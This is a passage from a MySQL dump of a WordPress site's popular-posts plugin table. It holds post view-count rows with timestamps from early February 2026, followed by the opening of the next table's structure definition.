01:27:00'),(105226,5769,1,'2026-02-04','2026-02-04 01:28:42'),(105227,5570,1,'2026-02-04','2026-02-04 01:58:24'),(105228,5712,1,'2026-02-04','2026-02-04 02:18:40'),(105229,4691,1,'2026-02-04','2026-02-04 02:22:17'),(105230,5769,1,'2026-02-04','2026-02-04 02:23:35'),(105231,5712,1,'2026-02-04','2026-02-04 03:05:53'),(105232,5712,1,'2026-02-04','2026-02-04 03:06:06'),(105233,5712,1,'2026-02-04','2026-02-04 03:06:07'),(105234,5712,1,'2026-02-04','2026-02-04 03:28:29'),(105235,5712,1,'2026-02-04','2026-02-04 03:58:32'),(105236,4326,1,'2026-02-04','2026-02-04 04:24:30'),(105237,3664,1,'2026-02-04','2026-02-04 04:46:50'),(105238,4911,1,'2026-02-04','2026-02-04 04:53:12'),(105239,80,1,'2026-02-04','2026-02-04 05:04:57'),(105240,80,1,'2026-02-04','2026-02-04 05:05:43'),(105241,4840,1,'2026-02-04','2026-02-04 05:05:59'),(105242,5626,1,'2026-02-04','2026-02-04 05:06:59'),(105243,80,1,'2026-02-04','2026-02-04 05:10:08'),(105244,5397,1,'2026-02-04','2026-02-04 05:22:11'),(105245,5409,1,'2026-02-04','2026-02-04 05:50:23'),(105246,5409,1,'2026-02-04','2026-02-04 05:50:24'),(105247,5409,1,'2026-02-04','2026-02-04 05:50:26'),(105248,3056,1,'2026-02-04','2026-02-04 06:10:05'),(105249,3229,1,'2026-02-04','2026-02-04 06:10:06'),(105250,5425,1,'2026-02-04','2026-02-04 06:11:09'),(105251,5502,1,'2026-02-04','2026-02-04 07:58:35'),(105252,4712,1,'2026-02-04','2026-02-04 08:13:55'),(105253,5593,1,'2026-02-04','2026-02-04 08:56:38'),(105254,1604,1,'2026-02-04','2026-02-04 09:19:51'),(105255,1697,1,'2026-02-04','2026-02-04 09:41:09'),(105256,4576,1,'2026-02-04','2026-02-04 09:52:53'),(105257,4335,1,'2026-02-04','2026-02-04 10:15:08'),(105258,4719,1,'2026-02-04','2026-02-04 10:36:12'),(105259,1544,1,'2026-02-04','2026-02-04 10:46:24'),(105260,91,1,'2026-02-04','2026-02-04 10:50:19'),(105261,4520,1,'2026-02-04','2026-02-04 10:59:15'),(105262,80,1,'2026-02-04','2026-02-04 11:00:19'),(105263,3023,1,'2026-02-04','2026-02-04 11:03:42'),(105264,5276,1,'2026-02-04','2026-02-04 11:08:05'),(105265,2904,1,'2026-02-04','2026-02-04 11:14:00'),(105266,5472,1,'2026-02-04','2026-02-04 11:18:09'),(105267,5343,1,'2026-02-04','2026-02-04 11:25:46'),(105268,5400,1,'2026-02-04','2026-02-04 12:02:44'),(105269,3498,1,'2026-02-04','2026-02-04 12:06:12'),(105270,4612,1,'2026-02-04','2026-02-04 12:09:09'),(105271,1703,1,'2026-02-04','2026-02-04 12:28:22'),(105272,2419,1,'2026-02-04','2026-02-04 12:32:42'),(105273,2410,1,'2026-02-04','2026-02-04 12:54:02'),(105274,2156,1,'2026-02-04','2026-02-04 13:02:47'),(105275,5454,1,'2026-02-04','2026-02-04 13:18:49'),(105276,1614,1,'2026-02-04','2026-02-04 13:29:15'),(105277,5712,1,'2026-02-04','2026-02-04 13:30:12'),(105278,5712,1,'2026-02-04','2026-02-04 13:32:51'),(105279,5502,1,'2026-02-04','2026-02-04 13:54:32'),(105280,5409,1,'2026-02-04','2026-02-04 14:33:46'),(105281,5397,1,'2026-02-04','2026-02-04 14:51:26'),(105282,4744,1,'2026-02-04','2026-02-04 14:54:55'),(105283,5703,1,'2026-02-04','2026-02-04 15:34:03'),(105284,4883,1,'2026-02-04','2026-02-04 16:30:44'),(105285,3705,1,'2026-02-04','2026-02-04 16:30:52'),(105286,1586,1,'2026-02-04','2026-02-04 16:34:45'),(105287,80,1,'2026-02-04','2026-02-04 16:42:34'),(105288,2503,1,'2026-02-04','2026-02-04 16:45:06'),(105289,5666,1,'2026-02-04','2026-02-04 17:10:31'),(105290,5304,1,'2026-02-04','2026-02-04 17:11:28'),(105291,1602,1,'2026-02-04','2026-02-04 17:35:33'),(105292,5636,1,'2026-02-04','2026-02-04 18:11:18'),(105293,2252,1,'2026-02-04','2026-02-04 18:30:51'),(105294,76,1,'2026-02-04','2026-02-04 19:18:34'),(105295,4759,1,'2026-02-04','2026-02-04 19:58:36'),(105296,2558,1,'2026-02-04','2026-02-04 20:30:41'),(105297,2904,1,'2026-02-04','2026-02-04 20:34:56'),(105298,2904,1,'2026-02-04','2026-02-04 20:40:36'),(105299,2904,1,'2026-02-04','2026-02-04 20:42:10'),(105300,3691,1,'2026-02-04','2026-02-04 21:45:40'),(105301,3083,1,'2026-02-04','2026-02-04 21:54:42'),(105302,5449,1,'2026-02-04','2026-02-04 21:56:06'),(105303,3083,1,'2026-02-04','2026-02-04 22:09:38'),(105304,2911,1,'2026-02-04','2026-02-04 22:14:30'),(105305,5700,1,'2026-02-04','2026-02-04 22:17:13'),(105306,4950,1,'2026-02-04','2026-02-04 23:04:03'),(105307,4660,1,'2026-02-04','2026-02-04 23:13:00'),(105308,1592,1,'2026-02-04','2026-02-04 23:58:50'),(105309,5406,1,'2026-02-05','2026-02-05 00:06:24'),(105310,5725,1,'2026-02-05','2026-02-05 00:29:20'),(105311,4722,1,'2026-02-05','2026-02-05 04:28:03'),(105312,4744,1,'2026-02-05','2026-02-05 05:29:21'),(105313,4960,1,'2026-02-05','2026-02-05 06:03:12'),(105314,4363,1,'2026-02-05','2026-02-05 06:13:14'),(105315,4608,1,'2026-02-05','2026-02-05 06:24:24'),(105316,5741,1,'2026-02-05','2026-02-05 06:54:41'),(105317,3498,1,'2026-02-05','2026-02-05 07:02:45'),(105318,2993,1,'2026-02-05','2026-02-05 07:17:59'),(105319,3710,1,'2026-02-05','2026-02-05 07:29:14'),(105320,5163,1,'2026-02-05','2026-02-05 07:35:30'),(105321,5163,1,'2026-02-05','2026-02-05 07:54:38'),(105322,1584,1,'2026-02-05','2026-02-05 08:13:07'),(105323,335,1,'2026-02-05','2026-02-05 09:07:12'),(105324,3038,1,'2026-02-05','2026-02-05 09:33:50'),(105325,91,1,'2026-02-05','2026-02-05 10:54:28'),(105326,89,1,'2026-02-05','2026-02-05 11:51:28'),(105327,5530,1,'2026-02-05','2026-02-05 11:52:08'),(105328,5712,1,'2026-02-05','2026-02-05 11:56:25'),(105329,5712,1,'2026-02-05','2026-02-05 11:56:28'),(105330,5712,1,'2026-02-05','2026-02-05 11:56:33'),(105331,5712,1,'2026-02-05','2026-02-05 11:56:38'),(105332,5712,1,'2026-02-05','2026-02-05 11:56:48'),(105333,5712,1,'2026-02-05','2026-02-05 11:56:50'),(105334,5712,1,'2026-02-05','2026-02-05 11:56:52'),(105335,5712,1,'2026-02-05','2026-02-05 11:56:56'),(105336,5712,1,'2026-02-05','2026-02-05 11:58:15'),(105337,5712,1,'2026-02-05','2026-02-05 11:59:44'),(105338,5712,1,'2026-02-05','2026-02-05 12:00:29'),(105339,5712,1,'2026-02-05','2026-02-05 12:00:30'),(105340,5712,1,'2026-02-05','2026-02-05 12:00:36'),(105341,5712,1,'2026-02-05','2026-02-05 12:27:16'),(105342,1715,1,'2026-02-05','2026-02-05 12:33:20'),(105343,5712,1,'2026-02-05','2026-02-05 12:40:17'),(105344,3251,1,'2026-02-05','2026-02-05 12:48:27'),(105345,5725,1,'2026-02-05','2026-02-05 13:09:02'),(105346,5553,1,'2026-02-05','2026-02-05 14:28:25'),(105347,4950,1,'2026-02-05','2026-02-05 14:33:06'),(105348,3102,1,'2026-02-05','2026-02-05 14:42:55'),(105349,4840,1,'2026-02-05','2026-02-05 15:05:02'),(105350,1586,1,'2026-02-05','2026-02-05 15:11:55'),(105351,5522,1,'2026-02-05','2026-02-05 15:13:04'),(105352,87,1,'2026-02-05','2026-02-05 15:24:51'),(105353,4963,1,'2026-02-05','2026-02-05 15:31:58'),(105354,4950,1,'2026-02-05','2026-02-05 15:34:44'),(105355,4878,1,'2026-02-05','2026-02-05 15:37:36'),(105356,485,1,'2026-02-05','2026-02-05 15:41:22'),(105357,4950,1,'2026-02-05','2026-02-05 16:15:23'),(105358,2704,1,'2026-02-05','2026-02-05 16:26:39'),(105359,5692,1,'2026-02-05','2026-02-05 17:23:58'),(105360,5037,1,'2026-02-05','2026-02-05 18:19:37'),(105361,3307,1,'2026-02-05','2026-02-05 18:20:41'),(105362,5522,1,'2026-02-05','2026-02-05 18:31:43'),(105363,2420,1,'2026-02-05','2026-02-05 18:38:50'),(105364,4335,1,'2026-02-05','2026-02-05 18:40:06'),(105365,4840,1,'2026-02-05','2026-02-05 18:44:05'),(105366,4950,1,'2026-02-05','2026-02-05 18:59:25'),(105367,84,1,'2026-02-05','2026-02-05 19:03:14'),(105368,5712,1,'2026-02-05','2026-02-05 19:21:21'),(105369,4416,1,'2026-02-05','2026-02-05 19:23:08'),(105370,72,1,'2026-02-05','2026-02-05 20:07:39'),(105371,1592,1,'2026-02-05','2026-02-05 20:17:51'),(105372,3749,1,'2026-02-05','2026-02-05 21:27:09'),(105373,1709,1,'2026-02-05','2026-02-05 21:35:51'),(105374,5712,1,'2026-02-05','2026-02-05 21:36:47'),(105375,4966,1,'2026-02-05','2026-02-05 22:09:33'),(105376,3721,1,'2026-02-05','2026-02-05 22:24:47'),(105377,5771,1,'2026-02-05','2026-02-05 22:44:54'),(105378,5771,1,'2026-02-05','2026-02-05 22:48:15'),(105379,5771,1,'2026-02-05','2026-02-05 22:49:38'),(105380,5771,1,'2026-02-05','2026-02-05 22:56:13'),(105381,3056,1,'2026-02-05','2026-02-05 23:09:38'),(105382,3066,1,'2026-02-05','2026-02-05 23:27:37'),(105383,4404,1,'2026-02-05','2026-02-05 23:33:47'),(105384,4944,1,'2026-02-06','2026-02-06 00:05:06'),(105385,474,1,'2026-02-06','2026-02-06 00:20:54'),(105386,474,1,'2026-02-06','2026-02-06 00:20:55'),(105387,5062,1,'2026-02-06','2026-02-06 00:21:33'),(105388,4960,1,'2026-02-06','2026-02-06 00:37:52'),(105389,2420,1,'2026-02-06','2026-02-06 00:53:48'),(105390,3056,1,'2026-02-06','2026-02-06 01:22:37'),(105391,5428,1,'2026-02-06','2026-02-06 01:26:05'),(105392,5502,1,'2026-02-06','2026-02-06 01:33:14'),(105393,4977,1,'2026-02-06','2026-02-06 01:44:30'),(105394,2813,1,'2026-02-06','2026-02-06 01:47:04'),(105395,4950,1,'2026-02-06','2026-02-06 02:05:12'),(105396,3498,1,'2026-02-06','2026-02-06 02:16:20'),(105397,5771,1,'2026-02-06','2026-02-06 02:48:57'),(105398,4654,1,'2026-02-06','2026-02-06 02:50:31'),(105399,1747,1,'2026-02-06','2026-02-06 03:01:28'),(105400,4980,1,'2026-02-06','2026-02-06 04:28:13'),(105401,5771,1,'2026-02-06','2026-02-06 05:08:03'),(105402,4950,1,'2026-02-06','2026-02-06 06:20:00'),(105403,4722,1,'2026-02-06','2026-02-06 06:32:33'),(105404,5771,1,'2026-02-06','2026-02-06 06:35:15'),(105405,5771,1,'2026-02-06','2026-02-06 07:30:45'),(105406,5461,1,'2026-02-06','2026-02-06 07:59:04'),(105407,5771,1,'2026-02-06','2026-02-06 08:10:04'),(105408,5712,1,'2026-02-06','2026-02-06 08:32:48'),(105409,5712,1,'2026-02-06','2026-02-06 08:36:32'),(105410,2178,1,'2026-02-06','2026-02-06 09:22:11'),(105411,5771,1,'2026-02-06','2026-02-06 09:26:07'),(105412,5567,1,'2026-02-06','2026-02-06 09:46:01'),(105413,4944,1,'2026-02-06','2026-02-06 10:22:28'),(105414,5771,1,'2026-02-06','2026-02-06 10:40:19'),(105415,68,1,'2026-02-06','2026-02-06 11:01:18'),(105416,1582,1,'2026-02-06','2026-02-06 11:09:32'),(105417,1582,1,'2026-02-06','2026-02-06 11:09:34'),(105418,68,1,'2026-02-06','2026-02-06 11:22:16'),(105419,4858,1,'2026-02-06','2026-02-06 12:21:20'),(105420,3072,1,'2026-02-06','2026-02-06 12:26:47'),(105421,3079,1,'2026-02-06','2026-02-06 12:28:47'),(105422,5593,1,'2026-02-06','2026-02-06 13:41:18'),(105423,5253,1,'2026-02-06','2026-02-06 14:04:22'),(105424,5415,1,'2026-02-06','2026-02-06 14:09:27'),(105425,5649,1,'2026-02-06','2026-02-06 15:22:05'),(105426,5712,1,'2026-02-06','2026-02-06 15:58:22'),(105427,4691,1,'2026-02-06','2026-02-06 15:59:36'),(105428,5712,1,'2026-02-06','2026-02-06 17:27:31'),(105429,4950,1,'2026-02-06','2026-02-06 17:48:36'),(105430,5712,1,'2026-02-06','2026-02-06 17:50:22'),(105431,5712,1,'2026-02-06','2026-02-06 17:55:05'),(105432,1780,1,'2026-02-06','2026-02-06 18:10:07'),(105433,5741,1,'2026-02-06','2026-02-06 18:12:15'),(105434,4950,1,'2026-02-06','2026-02-06 19:55:10'),(105435,5771,1,'2026-02-06','2026-02-06 20:47:25'),(105436,1602,1,'2026-02-06','2026-02-06 20:47:31'),(105437,4357,1,'2026-02-06','2026-02-06 21:15:02'),(105438,1588,1,'2026-02-06','2026-02-06 21:38:48'),(105439,5771,1,'2026-02-06','2026-02-06 22:36:19'),(105440,1608,1,'2026-02-06','2026-02-06 23:33:07'),(105441,1766,1,'2026-02-07','2026-02-07 00:37:55'),(105442,1734,1,'2026-02-07','2026-02-07 01:11:56'),(105443,3738,1,'2026-02-07','2026-02-07 01:15:08'),(105444,1612,1,'2026-02-07','2026-02-07 03:03:48'),(105445,5472,1,'2026-02-07','2026-02-07 03:14:05'),(105446,4542,1,'2026-02-07','2026-02-07 05:40:15'),(105447,5712,1,'2026-02-07','2026-02-07 06:52:59'),(105448,3056,1,'2026-02-07','2026-02-07 07:02:53'),(105449,3746,1,'2026-02-07','2026-02-07 08:40:51'),(105450,68,1,'2026-02-07','2026-02-07 09:22:49'),(105451,2457,1,'2026-02-07','2026-02-07 09:49:04'),(105452,5703,1,'2026-02-07','2026-02-07 10:47:44'),(105453,1608,1,'2026-02-07','2026-02-07 11:03:45'),(105454,80,1,'2026-02-07','2026-02-07 11:07:54'),(105455,2159,1,'2026-02-07','2026-02-07 11:19:19'),(105456,1582,1,'2026-02-07','2026-02-07 11:29:52'),(105457,4556,1,'2026-02-07','2026-02-07 12:14:32'),(105458,5461,1,'2026-02-07','2026-02-07 13:04:13'),(105459,1544,1,'2026-02-07','2026-02-07 13:11:48'),(105460,4753,1,'2026-02-07','2026-02-07 13:45:16'),(105461,4719,1,'2026-02-07','2026-02-07 13:52:59'),(105462,1728,1,'2026-02-07','2026-02-07 14:31:50'),(105463,2148,1,'2026-02-07','2026-02-07 14:51:17'),(105464,76,1,'2026-02-07','2026-02-07 16:25:25'),(105465,4977,1,'2026-02-07','2026-02-07 16:30:32'),(105466,5696,1,'2026-02-07','2026-02-07 16:41:20'),(105467,2410,1,'2026-02-07','2026-02-07 16:45:10'),(105468,5696,1,'2026-02-07','2026-02-07 16:51:37'),(105469,5696,1,'2026-02-07','2026-02-07 16:54:53'),(105470,3038,1,'2026-02-07','2026-02-07 16:59:41'),(105471,3498,1,'2026-02-07','2026-02-07 17:09:10'),(105472,5712,1,'2026-02-07','2026-02-07 17:12:09'),(105473,5712,1,'2026-02-07','2026-02-07 17:13:45'),(105474,5696,1,'2026-02-07','2026-02-07 17:14:05'),(105475,2956,1,'2026-02-07','2026-02-07 17:56:23'),(105476,2956,1,'2026-02-07','2026-02-07 18:05:09'),(105477,5412,1,'2026-02-07','2026-02-07 18:11:48'),(105478,2956,1,'2026-02-07','2026-02-07 18:17:03'),(105479,2956,1,'2026-02-07','2026-02-07 18:18:26'),(105480,5741,1,'2026-02-07','2026-02-07 18:29:42'),(105481,1774,1,'2026-02-07','2026-02-07 18:40:45'),(105482,485,1,'2026-02-07','2026-02-07 19:05:03'),(105483,5762,1,'2026-02-07','2026-02-07 19:34:24'),(105484,5762,1,'2026-02-07','2026-02-07 19:34:26'),(105485,5037,1,'2026-02-07','2026-02-07 19:53:50'),(105486,5522,1,'2026-02-07','2026-02-07 20:11:57'),(105487,3109,1,'2026-02-07','2026-02-07 20:18:23'),(105488,3109,1,'2026-02-07','2026-02-07 20:22:11'),(105489,3109,1,'2026-02-07','2026-02-07 20:32:54'),(105490,3109,1,'2026-02-07','2026-02-07 20:43:29'),(105491,5406,1,'2026-02-07','2026-02-07 21:02:01'),(105492,5080,1,'2026-02-07','2026-02-07 21:13:07'),(105493,80,1,'2026-02-07','2026-02-07 22:19:48'),(105494,1737,1,'2026-02-07','2026-02-07 22:40:16'),(105495,4840,1,'2026-02-07','2026-02-07 23:09:24'),(105496,5749,1,'2026-02-07','2026-02-07 23:23:56'),(105497,1602,1,'2026-02-07','2026-02-07 23:30:55'),(105498,5753,1,'2026-02-08','2026-02-08 01:43:48'),(105499,5674,1,'2026-02-08','2026-02-08 03:03:34'),(105500,1739,1,'2026-02-08','2026-02-08 03:10:41'),(105501,72,1,'2026-02-08','2026-02-08 03:12:00'),(105502,4335,1,'2026-02-08','2026-02-08 03:21:48'),(105503,5712,1,'2026-02-08','2026-02-08 03:33:38'),(105504,4941,1,'2026-02-08','2026-02-08 04:34:58'),(105505,4840,1,'2026-02-08','2026-02-08 05:08:25'),(105506,485,1,'2026-02-08','2026-02-08 07:29:07'),(105507,4832,1,'2026-02-08','2026-02-08 07:33:10'),(105508,5406,1,'2026-02-08','2026-02-08 08:36:26'),(105509,5406,1,'2026-02-08','2026-02-08 09:40:22'),(105510,91,1,'2026-02-08','2026-02-08 10:16:56'),(105511,4637,1,'2026-02-08','2026-02-08 11:15:02'),(105512,4960,1,'2026-02-08','2026-02-08 11:58:50'),(105513,5146,1,'2026-02-08','2026-02-08 12:13:14'),(105514,5721,1,'2026-02-08','2026-02-08 12:32:36'),(105515,3056,1,'2026-02-08','2026-02-08 13:07:12'),(105516,89,1,'2026-02-08','2026-02-08 13:15:27'),(105517,5712,1,'2026-02-08','2026-02-08 13:59:38'),(105518,3498,1,'2026-02-08','2026-02-08 14:06:44'),(105519,4950,1,'2026-02-08','2026-02-08 14:23:13'),(105520,467,1,'2026-02-08','2026-02-08 14:42:47'),(105521,5436,1,'2026-02-08','2026-02-08 15:37:02'),(105522,76,1,'2026-02-08','2026-02-08 15:45:07'),(105523,74,1,'2026-02-08','2026-02-08 15:45:12'),(105524,2503,1,'2026-02-08','2026-02-08 15:46:25'),(105525,4960,1,'2026-02-08','2026-02-08 16:26:42'),(105526,2457,1,'2026-02-08','2026-02-08 16:49:27'),(105527,5696,1,'2026-02-08','2026-02-08 17:37:01'),(105528,5071,1,'2026-02-08','2026-02-08 17:44:52'),(105529,4874,1,'2026-02-08','2026-02-08 17:49:13'),(105530,2775,1,'2026-02-08','2026-02-08 17:59:07'),(105531,335,1,'2026-02-08','2026-02-08 18:52:48'),(105532,470,1,'2026-02-08','2026-02-08 18:59:56'),(105533,84,1,'2026-02-08','2026-02-08 19:03:53'),(105534,473,1,'2026-02-08','2026-02-08 19:04:22'),(105535,5757,1,'2026-02-08','2026-02-08 19:20:58'),(105536,5757,1,'2026-02-08','2026-02-08 19:21:00'),(105537,2558,1,'2026-02-08','2026-02-08 19:25:46'),(105538,5050,1,'2026-02-08','2026-02-08 19:38:37'),(105539,84,1,'2026-02-08','2026-02-08 20:21:39'),(105540,87,1,'2026-02-08','2026-02-08 20:21:40'),(105541,80,1,'2026-02-08','2026-02-08 21:25:59'),(105542,1705,1,'2026-02-08','2026-02-08 21:35:38'),(105543,4428,1,'2026-02-08','2026-02-08 21:35:41'),(105544,2410,1,'2026-02-08','2026-02-08 21:52:48'),(105545,5598,1,'2026-02-08','2026-02-08 22:29:56'),(105546,5033,1,'2026-02-08','2026-02-08 23:39:10'),(105547,4622,1,'2026-02-09','2026-02-09 00:30:03'),(105548,2801,1,'2026-02-09','2026-02-09 02:08:52'),(105549,470,1,'2026-02-09','2026-02-09 03:15:20'),(105550,5682,1,'2026-02-09','2026-02-09 03:32:23'),(105551,4960,1,'2026-02-09','2026-02-09 03:33:16'),(105552,5433,1,'2026-02-09','2026-02-09 03:38:26'),(105553,1722,1,'2026-02-09','2026-02-09 04:08:18'),(105554,470,1,'2026-02-09','2026-02-09 04:14:13'),(105555,1604,1,'2026-02-09','2026-02-09 04:23:24'),(105556,5264,1,'2026-02-09','2026-02-09 05:21:29'),(105557,84,1,'2026-02-09','2026-02-09 06:05:29'),(105558,80,1,'2026-02-09','2026-02-09 06:31:41'),(105559,3498,1,'2026-02-09','2026-02-09 07:05:35'),(105560,91,1,'2026-02-09','2026-02-09 07:50:04'),(105561,80,1,'2026-02-09','2026-02-09 07:59:15'),(105562,1586,1,'2026-02-09','2026-02-09 08:46:12'),(105563,3271,1,'2026-02-09','2026-02-09 08:47:28'),(105564,1766,1,'2026-02-09','2026-02-09 09:20:22'),(105565,5712,1,'2026-02-09','2026-02-09 09:40:19'),(105566,91,1,'2026-02-09','2026-02-09 10:26:47'),(105567,76,1,'2026-02-09','2026-02-09 10:27:03'),(105568,4520,1,'2026-02-09','2026-02-09 10:44:06'),(105569,5712,1,'2026-02-09','2026-02-09 10:56:29'),(105570,4416,1,'2026-02-09','2026-02-09 11:17:34'),(105571,5588,1,'2026-02-09','2026-02-09 11:30:42'),(105572,4335,1,'2026-02-09','2026-02-09 11:33:48'),(105573,4963,1,'2026-02-09','2026-02-09 11:37:28'),(105574,468,1,'2026-02-09','2026-02-09 11:57:47'),(105575,76,1,'2026-02-09','2026-02-09 11:58:22'),(105576,68,1,'2026-02-09','2026-02-09 11:58:37'),(105577,3056,1,'2026-02-09','2026-02-09 12:05:04'),(105578,5441,1,'2026-02-09','2026-02-09 12:15:07'),(105579,3691,1,'2026-02-09','2026-02-09 12:17:49'),(105580,474,1,'2026-02-09','2026-02-09 12:24:25'),(105581,473,1,'2026-02-09','2026-02-09 12:24:26'),(105582,474,1,'2026-02-09','2026-02-09 12:25:05'),(105583,473,1,'2026-02-09','2026-02-09 12:25:05'),(105584,4883,1,'2026-02-09','2026-02-09 12:26:18'),(105585,473,1,'2026-02-09','2026-02-09 12:26:40'),(105586,474,1,'2026-02-09','2026-02-09 12:26:41'),(105587,4529,1,'2026-02-09','2026-02-09 12:47:55'),(105588,5712,1,'2026-02-09','2026-02-09 13:07:08'),(105589,5771,1,'2026-02-09','2026-02-09 13:27:47'),(105590,1604,1,'2026-02-09','2026-02-09 13:49:59'),(105591,76,1,'2026-02-09','2026-02-09 13:51:52'),(105592,80,1,'2026-02-09','2026-02-09 13:52:13'),(105593,5771,1,'2026-02-09','2026-02-09 13:55:30'),(105594,1582,1,'2026-02-09','2026-02-09 14:00:59'),(105595,76,1,'2026-02-09','2026-02-09 14:08:37'),(105596,1604,1,'2026-02-09','2026-02-09 14:08:38'),(105597,1604,1,'2026-02-09','2026-02-09 14:09:06'),(105598,4963,1,'2026-02-09','2026-02-09 14:13:48'),(105599,5522,1,'2026-02-09','2026-02-09 14:38:42'),(105600,5753,1,'2026-02-09','2026-02-09 15:09:54'),(105601,4963,1,'2026-02-09','2026-02-09 15:29:44'),(105602,1718,1,'2026-02-09','2026-02-09 15:38:34'),(105603,1739,1,'2026-02-09','2026-02-09 16:25:49'),(105604,487,1,'2026-02-09','2026-02-09 16:37:36'),(105605,468,1,'2026-02-09','2026-02-09 17:03:44'),(105606,468,1,'2026-02-09','2026-02-09 17:03:47'),(105607,4840,1,'2026-02-09','2026-02-09 17:04:52'),(105608,1582,1,'2026-02-09','2026-02-09 17:30:03'),(105609,4440,1,'2026-02-09','2026-02-09 18:00:43'),(105610,5730,1,'2026-02-09','2026-02-09 18:23:02'),(105611,4391,1,'2026-02-09','2026-02-09 19:18:10'),(105612,2558,1,'2026-02-09','2026-02-09 19:47:38'),(105613,5712,1,'2026-02-09','2026-02-09 21:40:21'),(105614,2904,1,'2026-02-09','2026-02-09 21:42:31'),(105615,2904,1,'2026-02-09','2026-02-09 21:44:29'),(105616,2904,1,'2026-02-09','2026-02-09 21:51:21'),(105617,74,1,'2026-02-09','2026-02-09 21:52:48'),(105618,5409,1,'2026-02-09','2026-02-09 21:53:39'),(105619,5712,1,'2026-02-09','2026-02-09 21:57:20'),(105620,4966,1,'2026-02-09','2026-02-09 22:07:55'),(105621,5712,1,'2026-02-09','2026-02-09 22:09:08'),(105622,2904,1,'2026-02-09','2026-02-09 22:09:31'),(105623,2904,1,'2026-02-09','2026-02-09 22:11:18'),(105624,2904,1,'2026-02-09','2026-02-09 22:12:26'),(105625,5762,1,'2026-02-09','2026-02-09 22:20:54'),(105626,4722,1,'2026-02-09','2026-02-09 22:52:47'),(105627,4373,1,'2026-02-09','2026-02-09 23:12:25'),(105628,5631,1,'2026-02-09','2026-02-09 23:33:02'),(105629,4963,1,'2026-02-09','2026-02-09 23:50:29'),(105630,4963,1,'2026-02-10','2026-02-10 00:06:40'),(105631,5636,1,'2026-02-10','2026-02-10 00:07:44'),(105632,4944,1,'2026-02-10','2026-02-10 00:22:58'),(105633,477,1,'2026-02-10','2026-02-10 00:37:27'),(105634,1614,1,'2026-02-10','2026-02-10 01:05:32'),(105635,5125,1,'2026-02-10','2026-02-10 01:28:00'),(105636,5298,1,'2026-02-10','2026-02-10 02:11:12'),(105637,3781,1,'2026-02-10','2026-02-10 02:29:44'),(105638,5433,1,'2026-02-10','2026-02-10 03:00:10'),(105639,5134,1,'2026-02-10','2026-02-10 03:00:39'),(105640,2801,1,'2026-02-10','2026-02-10 03:11:40'),(105641,5276,1,'2026-02-10','2026-02-10 03:56:41'),(105642,5356,1,'2026-02-10','2026-02-10 03:56:46'),(105643,5268,1,'2026-02-10','2026-02-10 04:08:28'),(105644,4960,1,'2026-02-10','2026-02-10 04:17:48'),(105645,1770,1,'2026-02-10','2026-02-10 04:36:21'),(105646,1728,1,'2026-02-10','2026-02-10 04:38:11'),(105647,1780,1,'2026-02-10','2026-02-10 04:41:10'),(105648,5515,1,'2026-02-10','2026-02-10 04:49:56'),(105649,2658,1,'2026-02-10','2026-02-10 04:55:52'),(105650,2965,1,'2026-02-10','2026-02-10 05:05:45'),(105651,5080,1,'2026-02-10','2026-02-10 06:02:38'),(105652,4529,1,'2026-02-10','2026-02-10 06:13:15'),(105653,4950,1,'2026-02-10','2026-02-10 06:32:51'),(105654,3781,1,'2026-02-10','2026-02-10 07:02:38'),(105655,3030,1,'2026-02-10','2026-02-10 07:10:18'),(105656,4457,1,'2026-02-10','2026-02-10 07:16:28'),(105657,3781,1,'2026-02-10','2026-02-10 07:24:18'),(105658,5605,1,'2026-02-10','2026-02-10 07:32:39'),(105659,5256,1,'2026-02-10','2026-02-10 07:50:35'),(105660,2658,1,'2026-02-10','2026-02-10 07:57:52'),(105661,1703,1,'2026-02-10','2026-02-10 08:03:03'),(105662,4645,1,'2026-02-10','2026-02-10 08:03:32'),(105663,3072,1,'2026-02-10','2026-02-10 08:03:32'),(105664,3781,1,'2026-02-10','2026-02-10 08:03:35'),(105665,4301,1,'2026-02-10','2026-02-10 08:05:41'),(105666,5601,1,'2026-02-10','2026-02-10 08:18:34'),(105667,5567,1,'2026-02-10','2026-02-10 08:29:58'),(105668,1728,1,'2026-02-10','2026-02-10 08:32:44'),(105669,87,1,'2026-02-10','2026-02-10 08:54:12'),(105670,91,1,'2026-02-10','2026-02-10 08:54:39'),(105671,4960,1,'2026-02-10','2026-02-10 09:29:25'),(105672,5753,1,'2026-02-10','2026-02-10 09:43:57'),(105673,5397,1,'2026-02-10','2026-02-10 09:55:11'),(105674,5712,1,'2026-02-10','2026-02-10 10:52:32'),(105675,5489,1,'2026-02-10','2026-02-10 11:06:36'),(105676,91,1,'2026-02-10','2026-02-10 11:10:12'),(105677,5712,1,'2026-02-10','2026-02-10 11:10:21'),(105678,5457,1,'2026-02-10','2026-02-10 11:18:08'),(105679,3240,1,'2026-02-10','2026-02-10 11:21:36'),(105680,5712,1,'2026-02-10','2026-02-10 11:52:28'),(105681,1604,1,'2026-02-10','2026-02-10 11:57:16'),(105682,5745,1,'2026-02-10','2026-02-10 12:26:54'),(105683,5682,1,'2026-02-10','2026-02-10 13:30:57'),(105684,89,1,'2026-02-10','2026-02-10 13:33:49'),(105685,1592,1,'2026-02-10','2026-02-10 13:34:15'),(105686,5353,1,'2026-02-10','2026-02-10 13:35:03'),(105687,5778,1,'2026-02-10','2026-02-10 14:04:12'),(105688,5778,1,'2026-02-10','2026-02-10 14:04:56'),(105689,3498,1,'2026-02-10','2026-02-10 14:12:30'),(105690,4612,1,'2026-02-10','2026-02-10 14:22:23'),(105691,5457,1,'2026-02-10','2026-02-10 14:47:25'),(105692,5778,1,'2026-02-10','2026-02-10 15:00:56'),(105693,4845,1,'2026-02-10','2026-02-10 15:19:33'),(105694,4950,1,'2026-02-10','2026-02-10 15:29:30'),(105695,335,1,'2026-02-10','2026-02-10 15:29:46'),(105696,3781,1,'2026-02-10','2026-02-10 15:36:56'),(105697,3056,1,'2026-02-10','2026-02-10 16:10:11'),(105698,3069,1,'2026-02-10','2026-02-10 16:19:26'),(105699,4524,1,'2026-02-10','2026-02-10 17:05:00'),(105700,4983,1,'2026-02-10','2026-02-10 17:17:54'),(105701,5778,1,'2026-02-10','2026-02-10 18:05:12'),(105702,5778,1,'2026-02-10','2026-02-10 18:10:01'),(105703,110,1,'2026-02-10','2026-02-10 18:14:51'),(105704,3004,1,'2026-02-10','2026-02-10 18:40:37'),(105705,5778,1,'2026-02-10','2026-02-10 19:15:59'),(105706,4496,1,'2026-02-10','2026-02-10 19:25:51');
/*!40000 ALTER TABLE `wp_popularpostssummary` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_popularpoststransients`
--

DROP TABLE IF EXISTS `wp_popularpoststransients`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
